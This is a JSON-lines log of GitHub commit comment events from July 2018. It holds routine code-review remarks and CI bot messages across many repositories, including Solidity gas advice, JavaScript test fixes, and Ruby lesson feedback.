{"id":"7977772836","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29737421,"position":84,"line":66,"path":"contracts/Remittance.sol","commit_id":"e572e9501219ab51a52d241092544c6610b6c9ae","created_at":"2018-07-17T16:13:23Z","updated_at":"2018-07-17T16:13:23Z","author_association":"NONE","body":"When the storage reference is created, there is a `KECCAK256` and some other arithmetic computed. Not very expensive. It is when you do `reference.exchange` that the `SLOAD` happens.\r\n\r\nYou do it once in the `emit LogProcessPayment` and another time for the transfer.\r\nWhat I want you to do is:\r\n\r\n```solidity\r\nuint exchange = reference.exchange; // 1 SLOAD, 1 MSTORE\r\nemit LogProcessPayment(paymentID, exchange,transferAmount); // 1 MLOAD\r\nexchange.transfer(transferAmount); // 1 MLOAD\r\n```\r\nThat is cheaper."}},"created_at":"2018-07-17T16:13:23Z"}
{"id":"7977779044","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29737439,"position":8,"line":18,"path":"test/Remittance.js","commit_id":"e572e9501219ab51a52d241092544c6610b6c9ae","created_at":"2018-07-17T16:14:30Z","updated_at":"2018-07-17T16:14:30Z","author_association":"NONE","body":"This ties up to the \"https://emn178.github.io/online-tools/keccak_256.html .\" question."}},"created_at":"2018-07-17T16:14:30Z"}
{"id":"7977780148","type":"CommitCommentEvent","actor":{"login":"ItaloAoki"},"repo":{"name":"SantanderTecnologia/TesteAndroid"},"payload":{"comment":{"id":29737442,"position":null,"line":null,"path":null,"commit_id":"3718832df3f9f0a064972101e26ff7e709f4e7e6","created_at":"2018-07-17T16:14:42Z","updated_at":"2018-07-17T16:14:42Z","author_association":"NONE","body":"https://github.com/AokiItalo/satanderTeste.git"}},"created_at":"2018-07-17T16:14:42Z"}
{"id":"7977781297","type":"CommitCommentEvent","actor":{"login":"HenriBeck"},"repo":{"name":"gomesalexandre/react-jss"},"payload":{"comment":{"id":29737447,"position":6,"line":9,"path":"src/jss.js","commit_id":"ef4819ae8caf6bef41e72fd41f2695defcd4853c","created_at":"2018-07-17T16:14:55Z","updated_at":"2018-07-17T16:14:55Z","author_association":"NONE","body":"StyleSheet is not being exported by jss. I don't know how this is even working"}},"created_at":"2018-07-17T16:14:55Z"}
{"id":"7977783223","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29737452,"position":75,"line":76,"path":"test/Remittance.js","commit_id":"e572e9501219ab51a52d241092544c6610b6c9ae","created_at":"2018-07-17T16:15:16Z","updated_at":"2018-07-17T16:15:16Z","author_association":"NONE","body":"You can choose too. Personally I do not like knowing that after the deadline there is a competition / uncertainty between Alice and Carol as to who will be fastest to get the money."}},"created_at":"2018-07-17T16:15:16Z"}
{"id":"7977784963","type":"CommitCommentEvent","actor":{"login":"furqanbaqai"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29737458,"position":25,"line":40,"path":"test/Remittance.js","commit_id":"f4f2f3b5de8261cfe0b443f414c7e7b37055aae8","created_at":"2018-07-17T16:15:34Z","updated_at":"2018-07-17T16:15:34Z","author_association":"OWNER","body":"@xavierlepretre Appreciate your help here.."}},"created_at":"2018-07-17T16:15:34Z"}
{"id":"7977789916","type":"CommitCommentEvent","actor":{"login":"kroitor"},"repo":{"name":"ccxt/ccxt"},"payload":{"comment":{"id":29737467,"position":null,"line":null,"path":null,"commit_id":"042eb4ee44102a27ffbc86689b0ef438efb75f7d","created_at":"2018-07-17T16:16:25Z","updated_at":"2018-07-17T16:16:25Z","author_association":"MEMBER","body":"Yeah, we might want to add a few more methods to our unified set... Something like fetchCanceledOrders. Or will need to make `canceled` orders optional in the output. This might require transforming the signature of fetch*Order(s) to also take order type and status into account. Need to think more on how to best tackle this. Your thoughts and ideas are welcome."}},"created_at":"2018-07-17T16:16:25Z"}
{"id":"7977796160","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29737478,"position":25,"line":40,"path":"test/Remittance.js","commit_id":"f4f2f3b5de8261cfe0b443f414c7e7b37055aae8","created_at":"2018-07-17T16:17:34Z","updated_at":"2018-07-17T16:17:34Z","author_association":"NONE","body":"Huh? I had left a comment.\r\nYou should `return remittanceCont.then(` because as it is, your promise chain is orphaned. Any error (from an assert for instance) that happens in there will no reach any catch.\r\nWhat `it` does is append `.catch` to the promise chain you return."}},"created_at":"2018-07-17T16:17:34Z"}
{"id":"7977796663","type":"CommitCommentEvent","actor":{"login":"matthewwardrop"},"repo":{"name":"airbnb/omniduct"},"payload":{"comment":{"id":29737480,"position":null,"line":null,"path":null,"commit_id":"9991f372dc8eb8102fad07dd93d4601f81eb1b7b","created_at":"2018-07-17T16:17:39Z","updated_at":"2018-07-17T16:17:39Z","author_association":"CONTRIBUTOR","body":"Flake8 is a wrapper around: pyflakes, pycodestyle and \"Ned Batchelder's\" McCabe script (code complexity). Thus, flake8 offers everything from pycodestyle, as well as stuff from pyflakes (coding errors independent of style) and code complexity monitoring (number of nested loops, etc)."}},"created_at":"2018-07-17T16:17:39Z"}
{"id":"7977799958","type":"CommitCommentEvent","actor":{"login":"mass10"},"repo":{"name":"mass10/go.note"},"payload":{"comment":{"id":29737489,"position":93,"line":93,"path":"code/images/resize-images-to-my-desktop/main.go","commit_id":"48d0e036921596df57033a4ac4b9bf8f9e172dd6","created_at":"2018-07-17T16:18:16Z","updated_at":"2018-07-17T16:18:16Z","author_association":"OWNER","body":"無駄"}},"created_at":"2018-07-17T16:18:16Z"}
{"id":"7977800917","type":"CommitCommentEvent","actor":{"login":"mass10"},"repo":{"name":"mass10/go.note"},"payload":{"comment":{"id":29737492,"position":null,"line":null,"path":null,"commit_id":"48d0e036921596df57033a4ac4b9bf8f9e172dd6","created_at":"2018-07-17T16:18:26Z","updated_at":"2018-07-17T16:18:26Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-17T16:18:26Z"}
{"id":"7977813806","type":"CommitCommentEvent","actor":{"login":"prabhupant"},"repo":{"name":"prabhupant/Smart-Parking"},"payload":{"comment":{"id":29737506,"position":2,"line":2,"path":"formula.txt","commit_id":"6a23654c76b995def83309236bd2c035a36984cb","created_at":"2018-07-17T16:20:47Z","updated_at":"2018-07-17T16:20:47Z","author_association":"OWNER","body":"Ok. Just wrote that for reference."}},"created_at":"2018-07-17T16:20:47Z"}
{"id":"7977814275","type":"CommitCommentEvent","actor":{"login":"ilyanoskov"},"repo":{"name":"aidnurs/SoulWorkout"},"payload":{"comment":{"id":29737508,"position":112,"line":59,"path":"src/components/Location.vue","commit_id":"02a1e49f9aef887a20854897434847bcca66ca5e","created_at":"2018-07-17T16:20:52Z","updated_at":"2018-07-17T16:20:52Z","author_association":"NONE","body":"this.price += 27 "}},"created_at":"2018-07-17T16:20:52Z"}
{"id":"7977816804","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29737517,"position":null,"line":null,"path":null,"commit_id":"57cd0c995a64e0147c678c19cbdded62d6e9a960","created_at":"2018-07-17T16:21:20Z","updated_at":"2018-07-17T16:21:20Z","author_association":"NONE","body":"table-refactor (nealkruis) - x86_64-MacOS-10.9-clang: Build Failed\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57cd0c995a64e0147c678c19cbdded62d6e9a960-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57cd0c995a64e0147c678c19cbdded62d6e9a960-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-17T16:21:20Z"}
{"id":"7977820681","type":"CommitCommentEvent","actor":{"login":"ilyanoskov"},"repo":{"name":"aidnurs/SoulWorkout"},"payload":{"comment":{"id":29737526,"position":10,"line":10,"path":"src/components/Overview/PracticeOverview.vue","commit_id":"02a1e49f9aef887a20854897434847bcca66ca5e","created_at":"2018-07-17T16:22:03Z","updated_at":"2018-07-17T16:22:03Z","author_association":"NONE","body":"why do you need this div here?\r\n"}},"created_at":"2018-07-17T16:22:03Z"}
{"id":"7977822292","type":"CommitCommentEvent","actor":{"login":"roytam1"},"repo":{"name":"roytam1/palemoon26"},"payload":{"comment":{"id":29737530,"position":4,"line":84,"path":"media/libcubeb/src/cubeb_winmm.c","commit_id":"34fc78cf0256df178d86dfdae26d38dc66ef46c8","created_at":"2018-07-17T16:22:22Z","updated_at":"2018-07-17T16:22:22Z","author_association":"OWNER","body":"Memo: https://github.com/Microsoft/msphpsql/blob/master/source/shared/interlockedslist.h"}},"created_at":"2018-07-17T16:22:22Z"}
{"id":"7977823268","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29737533,"position":null,"line":null,"path":null,"commit_id":"f12550f61a89491b42c5adf2b9a448b8a8f9435f","created_at":"2018-07-17T16:22:34Z","updated_at":"2018-07-17T16:22:34Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-221](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-221).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-221-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-17T16:22:34Z"}
{"id":"7977826087","type":"CommitCommentEvent","actor":{"login":"DonLakeFlyer"},"repo":{"name":"mavlink/qgroundcontrol"},"payload":{"comment":{"id":29737545,"position":4,"line":189,"path":"src/MissionManager/QGCMapPolygonVisuals.qml","commit_id":"ffe65c58e712682f668989b354d0efe34a6cd07a","created_at":"2018-07-17T16:23:06Z","updated_at":"2018-07-17T16:23:06Z","author_association":"CONTRIBUTOR","body":"@dogmaphobic Is there a reason you moved to menu up the hierarchy. The menu needs to be within the component otherwise it can't see the Set Radius dialog which is now broken."}},"created_at":"2018-07-17T16:23:06Z"}
{"id":"7977833770","type":"CommitCommentEvent","actor":{"login":"ywarnier"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":29737562,"position":null,"line":null,"path":null,"commit_id":"d665ae011f3ca41594629b319cc8bc6bb9039558","created_at":"2018-07-17T16:24:32Z","updated_at":"2018-07-17T16:24:32Z","author_association":"MEMBER","body":":+1: "}},"created_at":"2018-07-17T16:24:32Z"}
{"id":"7977835071","type":"CommitCommentEvent","actor":{"login":"rodluger"},"repo":{"name":"rodluger/starry"},"payload":{"comment":{"id":29737565,"position":null,"line":null,"path":null,"commit_id":"e4d32f6fea69ee4d60abd9b965a394fa8b60e4c2","created_at":"2018-07-17T16:24:47Z","updated_at":"2018-07-17T16:24:47Z","author_association":"OWNER","body":"@jlustigy `usetex` isn't going to work on Travis"}},"created_at":"2018-07-17T16:24:47Z"}
{"id":"7977842307","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29737579,"position":1,"line":1,"path":"1-Osnovy-Ruby-polnaya-PO/lesson5/module.rb","commit_id":"a6fe583efd143cc580fcc26aa93eaedd044e86d3","created_at":"2018-07-17T16:26:07Z","updated_at":"2018-07-17T16:26:07Z","author_association":"NONE","body":"правильно каждый модуль помещать в отедельный файл и давать ему соответствующее название\r\nтак же как ты поступаешь с классами"}},"created_at":"2018-07-17T16:26:07Z"}
{"id":"7977860298","type":"CommitCommentEvent","actor":{"login":"jspetrak"},"repo":{"name":"zelpage/portal"},"payload":{"comment":{"id":29737625,"position":5,"line":28,"path":"app/services/NewsService.php","commit_id":"ce3aa50bc7e4b633fda81dda0b02c14483f36a4d","created_at":"2018-07-17T16:29:22Z","updated_at":"2018-07-17T16:29:22Z","author_association":"CONTRIBUTOR","body":"Dtto. Přidat `int` k parametru funkce."}},"created_at":"2018-07-17T16:29:22Z"}
{"id":"7977860940","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29737627,"position":11,"line":11,"path":"Lesson_2/6.rb","commit_id":"64c54e13fe175b0fcc0f0ffb80ec89685e3f8230","created_at":"2018-07-17T16:29:29Z","updated_at":"2018-07-17T16:29:29Z","author_association":"NONE","body":"Лучше использовать \"новый\" синтаксис хэшей. { price: amount }"}},"created_at":"2018-07-17T16:29:29Z"}
{"id":"7977862110","type":"CommitCommentEvent","actor":{"login":"wjoel"},"repo":{"name":"posox/clouddriver"},"payload":{"comment":{"id":29737631,"position":13,"line":37,"path":"clouddriver-kubernetes/src/main/groovy/com/netflix/spinnaker/clouddriver/kubernetes/v2/caching/view/model/KubernetesV2Cluster.java","commit_id":"af724c1596881766f2b6c14f42cd242760541f3e","created_at":"2018-07-17T16:29:42Z","updated_at":"2018-07-17T16:29:42Z","author_association":"NONE","body":"I think we should set this to https://github.com/posox/clouddriver/blob/af724c1596881766f2b6c14f42cd242760541f3e/clouddriver-kubernetes/src/main/groovy/com/netflix/spinnaker/clouddriver/kubernetes/v2/caching/Keys.java#L86 similar to https://github.com/posox/clouddriver/blob/af724c1596881766f2b6c14f42cd242760541f3e/clouddriver-kubernetes/src/main/groovy/com/netflix/spinnaker/clouddriver/kubernetes/v1/model/KubernetesV1Cluster.groovy#L28 ?"}},"created_at":"2018-07-17T16:29:42Z"}
{"id":"7977862860","type":"CommitCommentEvent","actor":{"login":"sidneys"},"repo":{"name":"althonos/ffpb"},"payload":{"comment":{"id":29737632,"position":null,"line":null,"path":null,"commit_id":"180921aa26255443f3d7696489348d16aea9a9ac","created_at":"2018-07-17T16:29:50Z","updated_at":"2018-07-17T16:29:50Z","author_association":"CONTRIBUTOR","body":"@althonos \r\n\r\nThat's even more elegant.\r\n\r\nCheers,\r\nS"}},"created_at":"2018-07-17T16:29:50Z"}
{"id":"7977863986","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29737636,"position":null,"line":null,"path":null,"commit_id":"4e7bd3b031258eac1a7735d660d9462764a31626","created_at":"2018-07-17T16:30:04Z","updated_at":"2018-07-17T16:30:04Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-17T16:30:04Z"}
{"id":"7977869395","type":"CommitCommentEvent","actor":{"login":"dtarb"},"repo":{"name":"hydroshare/hydroshare"},"payload":{"comment":{"id":29737654,"position":null,"line":null,"path":null,"commit_id":"074f93cd8c698a1b176bf1f80ecc81b18e68f1db","created_at":"2018-07-17T16:31:02Z","updated_at":"2018-07-17T16:31:02Z","author_association":"MEMBER","body":"A consideration may be that sometimes zip files do not have folders embedded in them so files are placed at the same level in directory as the file being unzipped."}},"created_at":"2018-07-17T16:31:02Z"}
{"id":"7977870687","type":"CommitCommentEvent","actor":{"login":"willianjusten"},"repo":{"name":"willianjusten/spotify-wrapper"},"payload":{"comment":{"id":29737658,"position":4,"line":4,"path":"tests/album.spec.js","commit_id":"aa9e769454226e26639685c6391f6a61a0b940d9","created_at":"2018-07-17T16:31:16Z","updated_at":"2018-07-17T16:31:16Z","author_association":"OWNER","body":"Desde a versão 4+ do Sinon, ele já possui o método [.resolves(value)](http://sinonjs.org/releases/v6.1.3/stubs/#stubresolvesvalue) que permite retornar uma Promise e com isso, podemos simular a resposta do nosso `fetch`, que é usado para as chamadas da nossa lib,"}},"created_at":"2018-07-17T16:31:16Z"}
{"id":"7977876152","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29737674,"position":11,"line":11,"path":"Lesson_2/6.rb","commit_id":"64c54e13fe175b0fcc0f0ffb80ec89685e3f8230","created_at":"2018-07-17T16:32:17Z","updated_at":"2018-07-17T16:32:17Z","author_association":"NONE","body":"Вложенный хэш должен быть в двумя парами ключ/значение. В одном цена, в другом кол-во"}},"created_at":"2018-07-17T16:32:17Z"}
{"id":"7977879961","type":"CommitCommentEvent","actor":{"login":"iamchrissmith"},"repo":{"name":"cgewecke/eth-gas-reporter"},"payload":{"comment":{"id":29737682,"position":null,"line":null,"path":null,"commit_id":"9073fe7ea0eb7a158de3edba4faee606e5ad33e4","created_at":"2018-07-17T16:33:02Z","updated_at":"2018-07-17T16:33:02Z","author_association":"CONTRIBUTOR","body":"I probably wouldn't have time to look until this weekend at the earliest.  I'm happy to if you want, but if you can figure it out quickly this afternoon, that would probably be the fastest option.  It is likely due to my mapping of contract name from ABI to contract address during deploy to get to the function.  That isn't the tightest connection"}},"created_at":"2018-07-17T16:33:02Z"}
{"id":"7977883828","type":"CommitCommentEvent","actor":{"login":"ncortex"},"repo":{"name":"crocodic-studio/crudbooster"},"payload":{"comment":{"id":29737693,"position":null,"line":null,"path":null,"commit_id":"b82028de25352419adf1d0a794d65b24cde3eb1d","created_at":"2018-07-17T16:33:47Z","updated_at":"2018-07-17T16:33:47Z","author_association":"NONE","body":"Can I ask why this change? Statistics is a core part of Crudbooster and i see no reason for separate the code into 2 repositories.\r\nBTW, thanks for this awesome tool"}},"created_at":"2018-07-17T16:33:47Z"}
{"id":"7977884860","type":"CommitCommentEvent","actor":{"login":"willianjusten"},"repo":{"name":"willianjusten/spotify-wrapper"},"payload":{"comment":{"id":29737695,"position":19,"line":21,"path":"tests/album.spec.js","commit_id":"aa9e769454226e26639685c6391f6a61a0b940d9","created_at":"2018-07-17T16:34:00Z","updated_at":"2018-07-17T16:34:00Z","author_association":"OWNER","body":"Antes o método `returnsPromise()` era da lib  `sinon-stub-promise` que como é incompatível com o novo Sinon, dava um erro, dizendo que o método não existia.\r\n\r\nPara isso, o procedimento correto agora é:\r\n\r\n- Criar um stub do `fetch`, que no nosso caso é o `global.fetch` vindo do `node-fetch` para que funcione tanto no browser como no node.\r\n\r\n```\r\nstubedFetch = sinon.stub(global, 'fetch');\r\n```\r\n\r\n- Depois  de criado o stub, podemos resolver essa Promise, fazendo o retorno que desejarmos. No nosso caso, como temos um método `toJSON`, eu digo para resolver num retorno de JSON.\r\n\r\n```\r\npromise = stubedFetch.resolves({ json: () => ({ album: 'name' }) });\r\n```"}},"created_at":"2018-07-17T16:34:00Z"}
{"id":"7977887494","type":"CommitCommentEvent","actor":{"login":"TWD204"},"repo":{"name":"TWD204/github-slideshow"},"payload":{"comment":{"id":29737698,"position":null,"line":null,"path":null,"commit_id":"f2285b512d5209d0dbb4069acbe77f8a0cf1639d","created_at":"2018-07-17T16:34:32Z","updated_at":"2018-07-17T16:34:32Z","author_association":"OWNER","body":"---\r\nlayout: slide\r\ntitle: \"Welcome to our second slide!\"\r\n---\r\nYour text\r\nUse the left arrow to go back!"}},"created_at":"2018-07-17T16:34:32Z"}
{"id":"7977891065","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29737706,"position":null,"line":null,"path":null,"commit_id":"57cd0c995a64e0147c678c19cbdded62d6e9a960","created_at":"2018-07-17T16:35:15Z","updated_at":"2018-07-17T16:35:15Z","author_association":"NONE","body":"table-refactor (nealkruis) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: Build Failed\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57cd0c995a64e0147c678c19cbdded62d6e9a960-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57cd0c995a64e0147c678c19cbdded62d6e9a960-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-17T16:35:15Z"}
{"id":"7977891156","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29737707,"position":4,"line":4,"path":"1-Osnovy-Ruby-polnaya-PO/lesson5/module.rb","commit_id":"a6fe583efd143cc580fcc26aa93eaedd044e86d3","created_at":"2018-07-17T16:35:16Z","updated_at":"2018-07-17T16:35:16Z","author_association":"NONE","body":"Дастан\r\nкод надо проверять на работоспособность... кажется я это уже писал несколько раз тебе\r\nиначе он не имеет смысла\r\nкаждый из нас может написать много английских слов в редакторе, но если это все не работает, то зачем это нужно?"}},"created_at":"2018-07-17T16:35:16Z"}
{"id":"7977894586","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29737713,"position":4,"line":4,"path":"1-Osnovy-Ruby-polnaya-PO/lesson5/module.rb","commit_id":"a6fe583efd143cc580fcc26aa93eaedd044e86d3","created_at":"2018-07-17T16:35:57Z","updated_at":"2018-07-17T16:35:57Z","author_association":"NONE","body":"вот пример использования твоего метода:\r\n```\r\n$ irb -r ./module.rb \r\n2.5.1 :001 > class A; include AssignCompanyName; end;\r\n => A \r\n2.5.1 :002 > a = A.new\r\n => #<A:0x0000000001f0c2a0> \r\n2.5.1 :003 > a.assign('first')\r\nTraceback (most recent call last):\r\n        3: from /home/max/.rvm/rubies/ruby-2.5.1/bin/irb:11:in `<main>'\r\n        2: from (irb):3\r\n        1: from .../lesson5/module.rb:3:in `assign'\r\nNameError (undefined local variable or method `names' for #<A:0x0000000001f0c2a0>)\r\nDid you mean?  name\r\n2.5.1 :004 >\r\n```\r\nкак видишь получаем ошибку"}},"created_at":"2018-07-17T16:35:57Z"}
{"id":"7977899842","type":"CommitCommentEvent","actor":{"login":"willianjusten"},"repo":{"name":"willianjusten/spotify-wrapper"},"payload":{"comment":{"id":29737722,"position":30,"line":60,"path":"tests/album.spec.js","commit_id":"aa9e769454226e26639685c6391f6a61a0b940d9","created_at":"2018-07-17T16:36:58Z","updated_at":"2018-07-17T16:36:58Z","author_association":"OWNER","body":"Como é uma Promise, nós precisamos de 2 etapas:\r\n\r\n- Primeiro nós chamamos o método desejado (que vai dar início a Promise)\r\n\r\n```\r\nconst album = spotify.album.getAlbum('4aawyAB9vmqN3uQ7FjRGTy');\r\n```\r\n\r\nE depois nós então usamos o `.then` como forma de resolver essa Promise, que será resolvida instantâneamente, já que criamos um stub para isso.\r\n\r\n```\r\nalbum.then((data) => {\r\n   expect(data).to.be.eql({ album: 'name' });\r\n});\r\n```\r\n\r\nRepare que nosso `expect` fica na parte interna do `then`, para que possamos comparar os valores passados e confirmar de que está de fato recebendo o dado correto.\r\n"}},"created_at":"2018-07-17T16:36:58Z"}
{"id":"7977900472","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"miguel-l/Stockfish"},"payload":{"comment":{"id":29737724,"position":null,"line":null,"path":null,"commit_id":"8f963145dc3044df2824086f0ddf91041c2019a4","created_at":"2018-07-17T16:37:07Z","updated_at":"2018-07-17T16:37:07Z","author_association":"NONE","body":"Probcut are not bounded in depth. So par example for a depth 30 search it seems really risky to prune only depending on a qsearch with higher bounds."}},"created_at":"2018-07-17T16:37:07Z"}
{"id":"7977900498","type":"CommitCommentEvent","actor":{"login":"LeoMcA"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29737725,"position":4,"line":149,"path":"app/controllers/users_controller.rb","commit_id":"21ebb1cd54dd19767a2d821d4c92f24f0c72a12c","created_at":"2018-07-17T16:37:07Z","updated_at":"2018-07-17T16:37:07Z","author_association":"CONTRIBUTOR","body":"Wow, that's some nice usage of the splat operator - I'd never considered using it like that!"}},"created_at":"2018-07-17T16:37:07Z"}
{"id":"7977901780","type":"CommitCommentEvent","actor":{"login":"ljacqu"},"repo":{"name":"Gnat008/perworldinventory-kt"},"payload":{"comment":{"id":29737727,"position":23,"line":61,"path":"src/test/kotlin/me/ebonjaeger/perworldinventory/conversion/ConvertTaskTest.kt","commit_id":"8fe3d7dd88fd8e3758f71b3a3a78e6c8510d7476","created_at":"2018-07-17T16:37:22Z","updated_at":"2018-07-17T16:37:22Z","author_association":"CONTRIBUTOR","body":"Hi, acknowledged and will try to fix on Wednesday :) Please bump on Thursday in case I forget :sweat_smile:"}},"created_at":"2018-07-17T16:37:22Z"}
{"id":"7977902376","type":"CommitCommentEvent","actor":{"login":"willianjusten"},"repo":{"name":"willianjusten/spotify-wrapper"},"payload":{"comment":{"id":29737729,"position":7,"line":66,"path":"package.json","commit_id":"aa9e769454226e26639685c6391f6a61a0b940d9","created_at":"2018-07-17T16:37:28Z","updated_at":"2018-07-17T16:37:28Z","author_association":"OWNER","body":"Aqui nós atualizamos o `sinon` e `sinon-chai`, além de removermos o `sinon-stub-promise`, que já não é mais necessário."}},"created_at":"2018-07-17T16:37:28Z"}
{"id":"7977906378","type":"CommitCommentEvent","actor":{"login":"gemmellr"},"repo":{"name":"tabish121/qpid-jms"},"payload":{"comment":{"id":29737738,"position":22,"line":49,"path":"qpid-jms-client/src/main/java/org/apache/qpid/jms/provider/amqp/AmqpProviderFactory.java","commit_id":"ea5394a8eedac50f631ccfb5bbc41ed412ff468d","created_at":"2018-07-17T16:38:13Z","updated_at":"2018-07-17T16:38:13Z","author_association":"COLLABORATOR","body":"Is the comment or code wrong? It still only seems to clear amqp.X values."}},"created_at":"2018-07-17T16:38:13Z"}
{"id":"7977908814","type":"CommitCommentEvent","actor":{"login":"leafo"},"repo":{"name":"itchio/butler"},"payload":{"comment":{"id":29737741,"position":null,"line":null,"path":null,"commit_id":"ba0c6430d89cb5d7e21a36d968fa26ee20ab0de7","created_at":"2018-07-17T16:38:39Z","updated_at":"2018-07-17T16:38:39Z","author_association":"MEMBER","body":":ship: "}},"created_at":"2018-07-17T16:38:39Z"}
{"id":"7977911805","type":"CommitCommentEvent","actor":{"login":"tjcurington"},"repo":{"name":"tjcurington/website"},"payload":{"comment":{"id":29737745,"position":1,"line":1,"path":"lipsum.txt","commit_id":"9dd520a3e03b903d9731e75e4fedf1aae3d75e99","created_at":"2018-07-17T16:39:10Z","updated_at":"2018-07-17T16:39:10Z","author_association":"OWNER","body":"### Lipsum Really?\r\n\r\nSo we really were not able to find better filler text?"}},"created_at":"2018-07-17T16:39:10Z"}
{"id":"7977916178","type":"CommitCommentEvent","actor":{"login":"willianjusten"},"repo":{"name":"willianjusten/spotify-wrapper"},"payload":{"comment":{"id":29737754,"position":44,"line":81,"path":"tests/album.spec.js","commit_id":"aa9e769454226e26639685c6391f6a61a0b940d9","created_at":"2018-07-17T16:39:58Z","updated_at":"2018-07-17T16:39:58Z","author_association":"OWNER","body":"Se reparar, eu to sempre verificando o mesmo valor, já que a Promise tá sempre resolvendo para o mesmo valor, de acordo com a linha L21, mas se você desejar, pode resolver as Promises de diferentes formas dentro de cada bloco."}},"created_at":"2018-07-17T16:39:58Z"}
{"id":"7977917291","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29737757,"position":null,"line":null,"path":null,"commit_id":"1ba828ee3a885aa631097d1672f520a2d8e4852d","created_at":"2018-07-17T16:40:12Z","updated_at":"2018-07-17T16:40:12Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/1ba828ee3a885aa631097d1672f520a2d8e4852d/index.html"}},"created_at":"2018-07-17T16:40:12Z"}
{"id":"7977918872","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29737763,"position":null,"line":null,"path":null,"commit_id":"57cd0c995a64e0147c678c19cbdded62d6e9a960","created_at":"2018-07-17T16:40:28Z","updated_at":"2018-07-17T16:40:28Z","author_association":"NONE","body":"table-refactor (nealkruis) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57cd0c995a64e0147c678c19cbdded62d6e9a960-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-17T16:40:28Z"}
